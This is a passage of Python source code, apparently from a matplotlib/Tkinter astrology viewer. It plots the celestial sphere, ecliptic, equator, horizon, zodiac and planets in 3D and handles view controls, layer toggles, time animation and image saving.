v_hor=[v_pl[0],v_pl[1],0]\r\n v_hor=v_hor/np.linalg.norm(v_hor) \r\n self.planets_ids[name][\"id_pt_Hor\"].set_data_3d(*v_hor)\r\n\r\n pl_φ_hor= np.arccos(v_hor[0]); \r\n\r\n if v_hor[1] < 0:\r\n pl_φ_hor = 2*np.pi - pl_φ_hor\r\n\r\n azimuth = 2*np.pi - pl_φ_hor + np.pi/2\r\n azimuth = norm_r(azimuth)\r\n\r\n pl_θ_hor= np.arccos(v_pl[2])\r\n pl_alt_hor= np.pi/2 - pl_θ_hor\r\n\r\n α = np.arctan(np.tan(np.pi/2 - pl_θ_hor)/np.sin(np.pi/2 - pl_φ_hor)) # α = proportionate horizon's inclination\r\n k=self.k\r\n w=self.w\r\n v_rot8 = self.Rodrigues_rotation(k, w, α)\r\n φ2 = self.ψ2\r\n x2,y2,z2 = self.circl_vect(v_rot8, w, φ2)\r\n self.planets_ids[name][\"id_proj_hor\"].set_data_3d(x2,y2,z2)\r\n\r\n k2=np.array(self.v_equinox) \r\n v2= -self.ecliptic_rot \r\n φ2=np.radians(lon) \r\n v_ecl = self.circl_vect(k2,v2,φ2)\r\n self.planets_ids[name][\"id_pt_Ecl\"].set_data_3d(*v_ecl)\r\n pl_φ_ecl=lon\r\n\r\n #----- help_lines\r\n ve_=self.line_vect(v_RA, v_pl)\r\n self.planets_ids[name][\"id_l_eq\"].set_data_3d(*ve_)\r\n\r\n ve_=self.line_vect(v_hor, v_pl)\r\n self.planets_ids[name][\"id_l_ho\"].set_data_3d(*ve_)\r\n \r\n ve_=self.line_vect(v_ecl, v_pl)\r\n self.planets_ids[name][\"id_l_ecl\"].set_data_3d(*ve_)\r\n\r\n id_l_ecl=0\r\n id_t=self.planets_ids[name][\"id_t\"]\r\n id_pt_Eq=self.planets_obj[id_t][\"id_pt_Eq\"][0]\r\n id_pt_Hor=self.planets_obj[id_t][\"id_pt_Hor\"][0]\r\n id_pt_Ecl=self.planets_obj[id_t][\"id_pt_Ecl\"][0]\r\n self.planets_obj[id_t][\"id_pt_Eq\"] = (id_pt_Eq, rd(norm_r(pl_φ_eq + self.v_equinox_ang)), v_RA, rd(pl_φ_eq)) \r\n self.planets_obj[id_t][\"id_pt_Hor\"] = (id_pt_Hor, rd(pl_φ_hor), v_hor, rd(azimuth), rd(pl_alt_hor))\r\n self.planets_obj[id_t][\"id_pt_Ecl\"] = (id_pt_Ecl, round(pl_φ_ecl,1), v_ecl)\r\n self.planets_obj[id_t][\"txt\"]=text\r\n\r\n def plot_zodiac(self): \r\n k2=np.array(self.v_equinox) \r\n v2= -self.ecliptic_rot\r\n ψ=0;i=1\r\n while ψ < 2*np.pi:\r\n v_ = self.circl_vect(k2,v2,ψ)\r\n v_1=np.multiply(v_, 1.01)\r\n v_2=np.multiply(v_, 0.99)\r\n data=np.array([v_1,v_2])\r\n id_1, = self.ax.plot(*v_, c=color_ecl_zod, marker=\"D\", markersize=2, picker=3, zorder=2)\r\n\r\n name=zodiac[i]\r\n sym =zodiac2[i]\r\n self.zodiac_obj[id_1] = (name, sym, v_)\r\n\r\n sym = \"$\" + zodiac2[i] + \"$\"\r\n v_s = self.circl_vect(k2, v2, ψ + np.pi/12)\r\n v_s=np.multiply(v_s, 1.05)\r\n id_2, = self.ax.plot(*v_s, c=\"#4E4C25\", marker=sym, markersize=10, picker=3, zorder=0, alpha=0.2)\r\n self.ecl_ids.append(id_2)\r\n\r\n self.zodiac_ids[i]={}\r\n self.zodiac_ids[i][\"dot\"]=id_1\r\n self.zodiac_ids[i][\"text\"]=id_2\r\n\r\n ψ+=np.pi/6\r\n i+=1\r\n\r\n def plot_zodiac_next(self):\r\n k2=np.array(self.v_equinox) \r\n v2= -self.ecliptic_rot\r\n ψ=0;i=1\r\n while ψ < 2*np.pi:\r\n v_ = self.circl_vect(k2,v2,ψ)\r\n v_1=np.multiply(v_, 1.01)\r\n v_2=np.multiply(v_, 0.99)\r\n data=np.array([v_1,v_2])\r\n self.zodiac_ids[i][\"dot\"].set_data_3d(*v_) \r\n tup=self.zodiac_obj[self.zodiac_ids[i][\"dot\"]] \r\n self.zodiac_obj[self.zodiac_ids[i][\"dot\"]]=(tup[1],tup[0],v_)\r\n v_s = self.circl_vect(k2, v2, ψ + np.pi/12)\r\n v_s=np.multiply(v_s, 1.05)\r\n self.zodiac_ids[i][\"text\"].set_data_3d(*v_s)\r\n \r\n ψ+=np.pi/6\r\n i+=1\r\n\r\n def plot_ecliptic_scale(self): \r\n k2=np.array(self.v_equinox) \r\n v2= -self.ecliptic_rot\r\n ψ=0;i=1\r\n first=True if len(self.ecliptic_scale)==0 else False\r\n while ψ < 360:\r\n v_ = self.circl_vect(k2,v2,np.radians(ψ))\r\n if first:\r\n id_, = self.ax.plot(*v_, c=\"#333\", marker=\"o\", markersize=1)#,zorder=1\r\n id_t=self.ax.text(*v_,s=str(ψ),fontsize=6,c=\"#333\", fontweight=400, picker=5, alpha=self.alpha_main, zorder=0)\r\n self.ecliptic_scale[i]=(id_,id_t)\r\n id_.set_visible(False)\r\n id_t.set_visible(False)\r\n else:\r\n self.ecliptic_scale[i][0].set_data_3d(*v_)\r\n self.ecliptic_scale[i][1].set_position_3d(v_)\r\n ψ+=10\r\n i+=1\r\n\r\n def plot_equator_scale(self): \r\n k2=np.array(self.v_equinox) \r\n v2= -self.ecliptic_rot\r\n ψ=0;i=1\r\n first=True if len(self.equator_scale)==0 else False\r\n while ψ < 360:\r\n φ2 = np.radians(ψ) - self.v_equinox_ang\r\n φ2=norm_r(φ2)\r\n v_ = self.circl_vect(self.equator_rot,self.k,φ2) \r\n if first:\r\n id_, = self.ax.plot(*v_, c=\"#333\", marker=\"o\", markersize=1)#,zorder=1\r\n id_t=self.ax.text(*v_,s=str(ψ),fontsize=6,c=\"#333\", fontweight=400, picker=5, alpha=self.alpha_main, zorder=0)\r\n self.equator_scale[i]=(id_,id_t)\r\n id_.set_visible(False)\r\n id_t.set_visible(False)\r\n else:\r\n self.equator_scale[i][0].set_data_3d(*v_)\r\n self.equator_scale[i][1].set_position_3d(v_)\r\n ψ+=10\r\n i+=1\r\n\r\n\r\n def plot_circle_scale(self, circle):\r\n k2=np.array([1,0,0])\r\n v2=np.array([0,1,0])\r\n if circle==\"Horizon\":\r\n obj_scale=self.Hor_scale={}\r\n k2=np.array([1,0,0])\r\n v2=np.array([0,1,0])\r\n elif circle==\"Prime vertical\":\r\n obj_scale=self.PV_scale={}\r\n k2=np.array([1,0,0])\r\n v2=np.array([0,0,1])\r\n\r\n ψ=0;i=1\r\n while ψ < 360:\r\n v_ = self.circl_vect(k2,v2,np.radians(ψ)) \r\n id_, = self.ax.plot(*v_, c=\"#333\", marker=\"o\", markersize=1)\r\n id_t=self.ax.text(*v_,s=str(ψ),fontsize=6,c=\"#333\", fontweight=400, picker=5, alpha=self.alpha_main, zorder=0)\r\n obj_scale[i]=(id_,id_t)\r\n id_.set_visible(False)\r\n id_t.set_visible(False)\r\n ψ+=10\r\n i+=1\r\n\r\n def draw_projected_horizon(self,rotation=np.pi/6, color_=\"#2D305C\", linestyle_=\"dashed\"):\r\n k=self.k\r\n w=np.array([0, -1, 0])\r\n v_rot6 = self.Rodrigues_rotation(k,w,rotation)\r\n φ2 = self.ψ2\r\n x2= w[0] * np.sin(φ2) + v_rot6[0] * np.cos(φ2)\r\n y2= w[1] * np.sin(φ2) + v_rot6[1] * np.cos(φ2)\r\n z2= w[2] * np.sin(φ2) + v_rot6[2] * np.cos(φ2)\r\n id_,=self.ax.plot(x2,y2,z2 ,color=color_, linestyle = linestyle_, linewidth=1)\r\n self.ids[id(id_)] =[[x2[3],y2[3],z2[0]],\"proportionate horizon\"] \r\n self.proj_horizons.append(id_)\r\n return id_\r\n\r\n def plot_parallel(self,shift,color_=\"#CABF6B\", alpha=1,style_=(0, (1, 3)), redraw=True):\r\n frac_poleN=np.multiply(shift,self.poleN) \r\n o_=[0,0,0]; o_shift=np.add(o_,frac_poleN)\r\n c=o_shift\r\n r=shiftx=np.sqrt(1-np.square(shift))\r\n v_rot_shift=self.equator_rot; k_shift=self.k\r\n v_rot_shift= np.multiply(r,v_rot_shift); k_shift= np.multiply(r,k_shift); \r\n v = k_shift ; w = v_rot_shift\r\n φ = self.ψ\r\n x =c[0] + v[0]*np.cos(φ) + w[0]*np.sin(φ)\r\n y =c[1] + v[1]*np.cos(φ) + w[1]*np.sin(φ)\r\n z =c[2] + v[2]*np.cos(φ) + w[2]*np.sin(φ)\r\n if redraw==True:\r\n circle_id, =self.ax.plot(x,y,z ,color=color_, linestyle = style_ , alpha=alpha, picker=2, lw=1)\r\n return (circle_id,[x,y,z]) \r\n else:\r\n return (None,[x,y,z])\r\n\r\n def draw_sphere(self):\r\n φ = np.linspace(0, 2 * np.pi, 100)\r\n θ = np.linspace(0, np.pi, 100)\r\n x = 1 * np.outer(np.cos(φ), np.sin(θ))\r\n y = 1 * np.outer(np.sin(φ), np.sin(θ))\r\n z = 1 * np.outer(np.ones(np.size(φ)), np.cos(θ))\r\n col_viol=\"#EFE9FF\"\r\n col_yel=\"#E9E4D1\"\r\n self.sph_alf=0.3\r\n id_ = self.ax.plot_surface(x, y, z, rstride=4, cstride=4, color=col_yel, linewidth=0, alpha=self.sph_alf)\r\n self.sphere_ = id_\r\n\r\n def draw_surface1(self):\r\n col_viol=\"#EFE9FF\"\r\n col_yel=\"#E9E4D1\"\r\n col_='#333'\r\n self.surface = Circle((0., 0.), 1, color=col_yel,alpha=0.3)\r\n self.ax.add_patch( self.surface)\r\n art3d.pathpatch_2d_to_3d( self.surface, z=0, zdir=\"z\")\r\n\r\n def draw_surface(self):\r\n col_yel1=\"#E9E4D1\"\r\n col_yel2=\"#D0CAB2\"\r\n \r\n angle=90\r\n theta1, theta2 = angle, angle + 180\r\n\r\n self.surface1 = Wedge((0., 0.), 1, theta1, theta2, fc=col_yel2,alpha=0.3)\r\n self.surface2 = Wedge((0., 0.), 1, theta2, theta1, fc=col_yel1,alpha=0.3)\r\n self.ax.add_patch(self.surface1)\r\n self.ax.add_patch(self.surface2)\r\n art3d.pathpatch_2d_to_3d(self.surface1, z=0, zdir=\"z\")\r\n art3d.pathpatch_2d_to_3d(self.surface2, z=0, zdir=\"z\")\r\n\r\n\r\n def new_now(self, planets_data, geo_latitude, data):\r\n self.planets_data=planets_data\r\n self.geo_latitude=geo_latitude\r\n self.data=data\r\n self.timestampIni = self.data[\"timestamp\"]\r\n\r\n self.plot_Equator_Ecliptic_next()\r\n self.plot_zodiac_next()\r\n self.plot_planets_next(self.planets_data)\r\n\r\n ARMC=self.planets_data[\"MC\"][\"eq\"][0]\r\n self.date_utc = self.data[\"d_utc\"]\r\n self.time_utc = self.data[\"t_utc\"]\r\n self.timestamp = self.data[\"timestamp\"]\r\n self.geo_longitude=float(self.data[\"lon\"])\r\n\r\n s1 = \"S\" if self.geo_latitude<0 else \"N\"\r\n s2 = \"W\" if self.geo_longitude<0 else \"E\"\r\n txt=\"ARMC={:.0f}°, lat={:.0f}°{}, lon={:.0f}°{}\".format(ARMC,self.geo_latitude,s1,self.geo_longitude,s2)\r\n self.id_text.set_text(txt)\r\n\r\n name = \" {} {} \".format(self.data[\"n\"], self.data[\"ln\"])\r\n time_loc_ = \" {}, {}\".format(self.data[\"date_loc\"],self.data[\"time_loc\"])\r\n name = \" {} {} \".format(self.data[\"n\"], self.data[\"ln\"])\r\n time_utc_ = \" UTC: {}, {} \".format(self.date_utc, self.time_utc)\r\n self.id_text_name.set_text(name)\r\n self.id_text_time.set_text(time_loc_)\r\n self.id_text_time2.set_text(time_utc_)\r\n\r\n self.legend_updt()\r\n\r\n self.canvas.draw() \r\n\r\n\r\n def Rodrigues_rotation(self, v, k, rotation): #Rodrigues' rotation formula #rotation about k; v= vector to rotate\r\n v_rot = v * np.cos(rotation) + np.cross(k, v) * np.sin(rotation) + k * np.dot(k, v) * (1 - np.cos(rotation))\r\n return v_rot\r\n\r\n def circl_vect(self,k,v,φ2,r=1): \r\n x = r * v[0] * np.sin(φ2) + r * k[0] * np.cos(φ2)\r\n y = r * v[1] * np.sin(φ2) + r * k[1] * np.cos(φ2)\r\n z = r * v[2] * np.sin(φ2) + r * k[2] * np.cos(φ2)\r\n return [x, y, z]\r\n\r\n def line_vect(self, k, v, n=10, col=\"#0D5022\"):\r\n x = np.linspace(k[0],v[0],n)\r\n y = np.linspace(k[1],v[1],n)\r\n z = np.linspace(k[2],v[2],n)\r\n return [x, y, z]\r\n \r\n def legend_updt(self):\r\n for leg in self.leg_obj:\r\n lin=self.leg_obj[leg][1]\r\n if lin==None:continue\r\n if isinstance(lin,tuple):lin=lin[0]\r\n isVisible = lin.get_visible()\r\n leg.set_alpha(1.0 if isVisible else 0.2)\r\n self.canvas.draw_idle()\r\n\r\n def show_annot(self,v3d,txt, interval_=5000):\r\n x2, y2, _ = proj3d.proj_transform(*v3d, self.ax.get_proj())\r\n self.annot.xy = x2, y2\r\n self.annot.set_text(txt)\r\n self.annot.set_visible(True)\r\n try:self.timer.stop()\r\n except:pass\r\n self.timer = self.canvas.new_timer(interval=interval_)\r\n self.timer.add_callback(self.clear_ann)\r\n self.timer.start()\r\n\r\n def toggle_ecliptic_scale(self, hide=False):\r\n isVisible= self.ecliptic_scale[1][1].get_visible()\r\n if hide==True:isVisible=True\r\n if self.ecl_circl_1.get_visible()==False:isVisible=True\r\n for i in self.ecliptic_scale:\r\n self.ecliptic_scale[i][0].set_visible(not isVisible)\r\n self.ecliptic_scale[i][1].set_visible(not isVisible)\r\n\r\n def toggle_equator_scale(self, hide=False):\r\n isVisible= self.equator_scale[1][1].get_visible()\r\n if hide==True:isVisible=True\r\n if self.eq_circl_1.get_visible()==False:isVisible=True\r\n for i in self.equator_scale:\r\n self.equator_scale[i][0].set_visible(not isVisible)\r\n self.equator_scale[i][1].set_visible(not isVisible) \r\n\r\n def toggle_horizon_scale(self, hide=False):\r\n isVisible= self.Hor_scale[1][1].get_visible()\r\n if hide==True:isVisible=True\r\n if self.hor_circl_1.get_visible()==False:isVisible=True\r\n for i in self.Hor_scale:\r\n self.Hor_scale[i][0].set_visible(not isVisible)\r\n self.Hor_scale[i][1].set_visible(not isVisible) \r\n\r\n def toggle_prime_vert_scale(self, hide=False):\r\n isVisible= self.PV_scale[1][1].get_visible()\r\n if hide==True:isVisible=True\r\n if self.prime_vert_1.get_visible()==False:isVisible=True\r\n for i in self.PV_scale:\r\n self.PV_scale[i][0].set_visible(not isVisible)\r\n self.PV_scale[i][1].set_visible(not isVisible) \r\n \r\n\r\n def key_(self,event):\r\n if event.key==\"escape\":\r\n pass\r\n #exit()\r\n\r\n elif event.key==\"left\":\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n azim_=azim_+1\r\n self.ax.view_init(azim = azim_, elev = elev_) \r\n self.canvas.draw_idle()\r\n\r\n elif event.key==\"right\":\r\n azim_, elev_ = self.ax.azim, self.ax.elev \r\n azim_=azim_-1\r\n self.ax.view_init(azim = azim_, elev = elev_) \r\n self.canvas.draw_idle()\r\n\r\n elif event.key==\"up\":\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n elev_+=1\r\n self.ax.view_init(azim = azim_, elev = elev_) \r\n self.canvas.draw_idle()\r\n\r\n elif event.key==\"down\":\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n elev_-=1\r\n self.ax.view_init(azim = azim_, elev = elev_)\r\n self.canvas.draw_idle()\r\n\r\n if event.key==\"j\":\r\n self.ax.view_init(azim = 0, elev = 0) \r\n self.canvas.draw_idle()\r\n if event.key==\"h\":\r\n self.canvas.draw_idle()\r\n elif event.key==\"ctrl+s\":\r\n filename=r\"3D_astro\"\r\n filename=asksaveasfilename(parent=self.parent,title=\"Save file\",initialdir=\"C:\\\\\",initialfile = filename,filetypes=[('image, .png', '*.png'),('All Files', '*.*')])\r\n if filename==\"\":return\r\n filename=f\"{filename}.png\"\r\n self.fig.savefig(filename)\r\n\r\n def onpick(self,event):\r\n if event.mouseevent.button in [2,\"up\",\"down\"]:return\r\n legend = event.artist\r\n if legend in self.legend.get_lines():\r\n txt=self.leg_obj[legend]\r\n txt=self.leg_obj[legend][0]\r\n if txt==\"Axes\":\r\n self.annot.set_visible(False)\r\n if event.mouseevent.button==3:\r\n dim = True if self.axes_id.get_alpha() != self.alpha_main else False\r\n alfa2= self.alpha_main if dim else 0.2\r\n self.axes_id.set_alpha(alfa2)\r\n self.canvas.draw_idle()\r\n return\r\n isVisible = self.axes_id.get_visible()\r\n self.axes_id.set_visible(not isVisible)\r\n legend.set_alpha(1.0 if not isVisible else 0.2)\r\n\r\n elif txt==\"Sphere\":\r\n self.annot.set_visible(False)\r\n if event.mouseevent.button==3:\r\n for id_ in [self.surface1, self.surface2]:#self.surface\r\n isVisible = id_.get_visible()\r\n id_.set_visible(not isVisible)\r\n return \r\n isVisible = self.sphere_.get_visible()\r\n self.sphere_.set_visible(not isVisible)\r\n legend.set_alpha(1.0 if not isVisible else 0.2) \r\n\r\n elif txt==\"Ecliptic\":\r\n self.annot.set_visible(False)\r\n if event.mouseevent.button==3:\r\n dim = True if self.ecl_circl_2.get_alpha() != self.alpha_main_2 else False\r\n alfa2= self.alpha_main_2 if dim else 0.3\r\n for cir in [self.ecl_circl_1, self.ecl_circl_2]:\r\n cir.set_alpha(alfa2)\r\n self.canvas.draw_idle()\r\n return\r\n isVisible = self.ecl_circl_1.get_visible()\r\n self.ecl_circl_1.set_visible(not isVisible)\r\n self.ecl_circl_2.set_visible(not isVisible)\r\n legend.set_alpha(1.0 if not isVisible else 0.2)\r\n for id_ in self.ecl_ids:\r\n id_.set_visible(not isVisible)\r\n for id_ in self.houses_obj:\r\n id_.set_visible(not isVisible)\r\n for id_ in self.zodiac_obj:\r\n id_.set_visible(not isVisible)\r\n\r\n self.toggle_ecliptic_scale(hide= True)\r\n\r\n elif txt==\"Equator\":\r\n self.annot.set_visible(False)\r\n if event.mouseevent.button==3:\r\n dim = True if self.eq_circl_2.get_alpha() != self.alpha_main_2 else False\r\n alfa2= self.alpha_main_2 if dim else 0.3\r\n for cir in [self.eq_circl_1, self.eq_circl_2]:\r\n cir.set_alpha(alfa2)\r\n self.canvas.draw_idle()\r\n return\r\n isVisible = self.eq_circl_1.get_visible()\r\n self.eq_circl_1.set_visible(not isVisible)\r\n self.eq_circl_2.set_visible(not isVisible)\r\n legend.set_alpha(1.0 if not isVisible else 0.2)\r\n for id_ in self.equat_ids:\r\n id_.set_visible(not isVisible)\r\n\r\n self.toggle_equator_scale(hide= True) \r\n\r\n elif txt==\"Horizon\":\r\n self.annot.set_visible(False)\r\n if event.mouseevent.button==3:\r\n dim = True if self.hor_circl_2.get_alpha() != self.alpha_main else False\r\n alfa2= self.alpha_main if dim else 0.2\r\n for cir in [self.hor_circl_1, self.hor_circl_2]:\r\n cir.set_alpha(alfa2)\r\n self.canvas.draw_idle()\r\n return\r\n isVisible = self.hor_circl_1.get_visible()\r\n self.hor_circl_1.set_visible(not isVisible)\r\n self.hor_circl_2.set_visible(not isVisible)\r\n legend.set_alpha(1.0 if not isVisible else 0.2)\r\n\r\n self.toggle_horizon_scale(hide= True) \r\n\r\n elif txt==\"Prime Vertical\":\r\n self.annot.set_visible(False)\r\n if event.mouseevent.button==3:\r\n dim = True if self.prime_vert_2.get_alpha() != self.alpha_main else False\r\n alfa2= self.alpha_main if dim else 0.2\r\n for cir in [self.prime_vert_1, self.prime_vert_2]:\r\n cir.set_alpha(alfa2)\r\n self.canvas.draw_idle()\r\n return\r\n isVisible = self.prime_vert_1.get_visible()\r\n self.prime_vert_1.set_visible(not isVisible)\r\n self.prime_vert_2.set_visible(not isVisible)\r\n legend.set_alpha(1.0 if not isVisible else 0.2)\r\n\r\n self.toggle_prime_vert_scale(hide= True)\r\n\r\n elif txt==\"Meridian\":\r\n self.annot.set_visible(False)\r\n if event.mouseevent.button==3:\r\n dim = True if self.mer_circle.get_alpha() != self.alpha_main else False\r\n alfa2= self.alpha_main if dim else 0.2\r\n self.mer_circle.set_alpha(alfa2)\r\n self.canvas.draw_idle()\r\n return\r\n isVisible = self.mer_circle.get_visible()\r\n self.mer_circle.set_visible(not isVisible)\r\n legend.set_alpha(1.0 if not isVisible else 0.2)\r\n\r\n elif txt==\"Show half\":\r\n self.annot.set_visible(False)\r\n if event.mouseevent.button==3:\r\n self.circles_alpha()\r\n self.canvas.draw_idle()\r\n return\r\n if self.half==0:\r\n self.half=1\r\n for id_ in self.view_West:\r\n id_.set_visible(False)\r\n for id_ in self.view_East:\r\n id_.set_visible(True) \r\n elif self.half==1:\r\n self.half=2\r\n for id_ in self.view_West:\r\n id_.set_visible(True)\r\n for id_ in self.view_East:\r\n id_.set_visible(False)\r\n elif self.half==2:\r\n self.half=0\r\n for id_ in self.view_West:\r\n id_.set_visible(True)\r\n for id_ in self.view_East:\r\n id_.set_visible(True)\r\n\r\n elif txt==\"Extra off\":\r\n for id_t in self.planets_obj:\r\n obj = self.planets_obj[id_t] \r\n for el in [\"id_Mer\", \"id_Mer_nat\", \"id_Par\", \"id_proj_hor\", \"id_proj_hor_nat\"]:\r\n obj[el].set_visible(False)\r\n for el in [\"id_pt_Eq\", \"id_pt_Hor\", \"id_pt_Ecl\"]:\r\n obj[el][0].set_visible(False)\r\n for el in [\"id_l_eq\", \"id_l_ecl\",\"id_l_ho\"]:\r\n obj[el].set_visible(False)\r\n self.annot.set_visible(False)\r\n\r\n self.toggle_ecliptic_scale(hide= True) \r\n self.toggle_equator_scale(hide= True) \r\n self.toggle_horizon_scale(hide= True) \r\n self.toggle_prime_vert_scale(hide= True)\r\n\r\n elif txt==\"Scale\":\r\n if event.mouseevent.button==3:\r\n self.toggle_equator_scale() \r\n else:\r\n self.toggle_ecliptic_scale()\r\n self.toggle_equator_scale()\r\n self.canvas.draw_idle()\r\n return\r\n\r\n if event.artist==self.id_v_start:\r\n if event.mouseevent.button==1:\r\n self.timestamp=self.timestampIni\r\n self.plot_next_prev(minutes=0)\r\n self.extra_off()\r\n self.ax.set_xlim(self.xlim)\r\n self.ax.set_ylim(self.ylim)\r\n self.ax.set_zlim(self.zlim)\r\n self.ax.view_init(azim = self.azim0, elev = self.elev0) \r\n self.mer_circle.set_visible(True)\r\n self.prime_vert_1.set_visible(True)\r\n self.prime_vert_2.set_visible(True) \r\n\r\n elif event.artist==self.id_v_chart:\r\n if event.mouseevent.button==3:\r\n azim_= 90 + np.degrees(self.Asc_φ_hor)\r\n elev_=self.pole_ecl_elev+90\r\n if self.south==True:elev_=self.pole_ecl_elev-90\r\n self.ax.view_init(azim = azim_, elev = elev_) \r\n else:\r\n azim_=90 + np.degrees(self.Asc_φ_hor)\r\n a1('azim_ 90 + np.degrees(self.Asc_φ_hor)',azim_,\"elev =\", self.pole_ecl_elev); #71,24\r\n self.ax.view_init(azim = azim_, elev = self.pole_ecl_elev) \r\n self.mer_circle.set_visible(False)\r\n self.prime_vert_1.set_visible(False)\r\n self.prime_vert_2.set_visible(False) \r\n if event.mouseevent.button==3:\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n self.ax.view_init(azim = 30, elev = elev_)\r\n\r\n \r\n elif event.artist==self.id_v_Eq:\r\n if event.mouseevent.button == 3:\r\n self.ax.view_init(azim = 90, elev = self.poleN_elev-90)\r\n else:\r\n self.ax.view_init(azim = 90, elev = self.poleN_elev)\r\n\r\n elif event.artist==self.id_v_anim:\r\n s=0; m=0; h=0\r\n val=self.radio.value_selected\r\n Δt=int(self.text_box.text)\r\n if val==\"sec\":\r\n s=Δt\r\n elif val==\"min\":\r\n m=Δt\r\n elif val==\"hour\":\r\n h=Δt\r\n \r\n if event.mouseevent.button==3:\r\n s=-s ; m=-m ; h=-h\r\n for i in range(10):\r\n self.parent.after(i*500, lambda s=s, m=m, h=h: self.plot_next_prev(seconds=s, minutes=m, hours=h))\r\n self.canvas.draw_idle() \r\n\r\n elif event.artist==self.id_v_prev:\r\n s=self.radio.value_selected\r\n Δt=int(self.text_box.text)\r\n if s==\"sec\":\r\n self.plot_next_prev(seconds=-Δt)\r\n elif s==\"min\":\r\n self.plot_next_prev(minutes=-Δt) \r\n elif s==\"hour\":\r\n self.plot_next_prev(hours=-Δt)\r\n\r\n val=self.radio.value_selected\r\n Δt=int(self.text_box.text)\r\n if val==\"sec\":\r\n s=Δt\r\n elif val==\"min\":\r\n m=Δt\r\n elif val==\"hour\":\r\n h=Δt\r\n\r\n elif event.artist==self.id_v_next:\r\n s=self.radio.value_selected\r\n Δt=int(self.text_box.text)\r\n if s==\"sec\":\r\n self.plot_next_prev(seconds=Δt)\r\n elif s==\"min\":\r\n\r\n self.plot_next_prev(minutes=Δt) \r\n elif s==\"hour\":\r\n self.plot_next_prev(hours=Δt)\r\n\r\n elif event.artist==self.id_E:\r\n self.ax.view_init(azim = 30,elev = 15) \r\n\r\n elif event.artist==self.id_W:\r\n self.ax.view_init(azim = 200, elev = 15)\r\n\r\n elif event.artist==self.id_N:\r\n self.ax.view_init(azim = 180, elev = -90) \r\n \r\n elif event.artist==self.id_S:\r\n self.ax.view_init(azim = 180, elev = 90) \r\n\r\n elif event.artist==self.id_A0:\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n if event.mouseevent.button==3:\r\n self.ax.view_init(azim = 0, elev = elev_) \r\n else:\r\n self.ax.view_init(azim = 0, elev = elev_) \r\n\r\n elif event.artist==self.id_E0:\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n if event.mouseevent.button==3:\r\n self.ax.view_init(azim = azim_, elev = 0) \r\n else:\r\n self.ax.view_init(azim = azim_, elev = 0) \r\n\r\n elif event.artist==self.id_A90:\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n if event.mouseevent.button==3:\r\n self.ax.view_init(azim = -90, elev = elev_) \r\n else:\r\n self.ax.view_init(azim = 90, elev = elev_) \r\n\r\n elif event.artist==self.id_A180:\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n if event.mouseevent.button==3:\r\n self.ax.view_init(azim = 180, elev = elev_) \r\n else:\r\n azim_=azim_+10\r\n self.ax.view_init(azim = 180, elev = elev_) \r\n\r\n elif event.artist==self.id_E90:\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n if event.mouseevent.button==3:\r\n self.ax.view_init(azim = azim_, elev = -90) \r\n else:\r\n self.ax.view_init(azim = azim_, elev = 90) \r\n\r\n elif event.artist==self.id_E180:\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n if event.mouseevent.button==3:\r\n self.ax.view_init(azim = azim_, elev = 180) \r\n else:\r\n self.ax.view_init(azim = azim_, elev = 180) \r\n\r\n elif event.artist==self.id_v_left:\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n if event.mouseevent.button==3:\r\n azim_-=1\r\n else:\r\n azim_-=10\r\n self.ax.view_init(azim = azim_, elev = elev_) \r\n\r\n elif event.artist==self.id_v_right:\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n if event.mouseevent.button==3:\r\n azim_+=1\r\n else: \r\n azim_+=10\r\n self.ax.view_init(azim = azim_, elev = elev_) \r\n\r\n elif event.artist==self.id_v_up:\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n if event.mouseevent.button==3:\r\n elev_+=1\r\n else: \r\n elev_=elev_+10\r\n self.ax.view_init(azim = azim_, elev = elev_) \r\n\r\n elif event.artist==self.id_v_down:\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n if event.mouseevent.button==3:\r\n elev_-=1\r\n else: \r\n elev_=elev_-10\r\n self.ax.view_init(azim = azim_, elev = elev_)\r\n\r\n elif event.artist==self.id_v_test:\r\n pass\r\n\r\n elif event.artist==self.id_help_ico:\r\n self.helpDialog = helpWindow_3D(self.parent,title=\"Help\")\r\n\r\n if event.artist in [self.id_v_start, self.id_v_up, self.id_v_down, self.id_v_left, self.id_v_right, self.id_E, self.id_W, self.id_N, self.id_S, self.id_E0, self.id_A0, self.id_E90, self.id_E180, self.id_A90, self.id_A180,self.id_v_Eq, self.id_v_chart, self.id_v_test,self.id_view, self.id_azim, self.id_elev]:\r\n azim, elev = self.ax.azim, self.ax.elev\r\n txt=\" azim={:.1f}°, elev={:.1f}° \".format(azim, elev)\r\n self.id_text_2.set_text(txt)\r\n self.canvas.draw_idle()\r\n self.timer_azim_elev(15000) \r\n return\r\n\r\n if event.artist in [self.eq_circl_1, self.eq_circl_2] and self.eq_circl_1.get_visible():\r\n el=event.artist\r\n el=event.artist\r\n ind = event.ind\r\n xx, yy, zz = el.get_data_3d()\r\n i=ind[0]\r\n x,y,z=[xx[i],yy[i],zz[i]]\r\n φ2=np.arccos(x);\r\n φ2a=np.degrees(φ2)\r\n if y>=0:\r\n φ2 = φ2 + np.pi/2\r\n elif y<0:\r\n φ2 = np.pi/2 - φ2\r\n if φ2<0: φ2 = φ2 + 2*np.pi \r\n if self.south==True: φ2=np.pi-φ2\r\n φ2=norm_r(φ2) \r\n φ2a=np.degrees(φ2)\r\n RA= norm_(φ2a + self.ARMC)\r\n self.show_txt_tip(RA,\"Equator\")\r\n\r\n elif event.artist in [self.ecl_circl_1, self.ecl_circl_2] and self.ecl_circl_1.get_visible():\r\n el=event.artist\r\n ind = event.ind\r\n xx, yy, zz = el.get_data_3d()\r\n i=ind[0]\r\n x,y,z=[xx[i],yy[i],zz[i]]\r\n d=np.dot(self.v_equinox,[x,y,z]);\r\n φ2=np.arccos(d)\r\n lon=np.degrees(φ2)\r\n \r\n if self.south==True: φ2=np.pi-φ2\r\n φ2=norm_r(φ2) \r\n φ2a=np.degrees(φ2)\r\n v=np.cross(self.v_equinox,[x,y,z])\r\n\r\n if self.v_MC[1]<=0 and 